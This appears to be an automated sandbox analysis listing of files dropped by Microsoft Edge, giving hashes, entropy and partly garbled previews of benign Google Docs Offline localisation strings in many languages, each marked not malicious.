                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2766
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                        MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                        SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                        SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                        SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):978
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                        MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                        SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                        SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                        SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):907
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                        MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                        SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                        SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                        SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):914
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                        MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                        SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                        SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                        SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):937
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                        MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                        SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                        SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                        SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1337
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                        MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                        SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                        SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                        SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2846
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                        MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                        SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                        SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                        SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):934
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                        MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                        SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                        SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                        SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):963
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                        MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                        SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                        SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                        SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1320
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):884
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):980
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1941
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1969
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1674
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1063
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1333
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1263
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1074
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):879
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1205
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):843
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):912
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                        MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                        SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                        SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                        SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
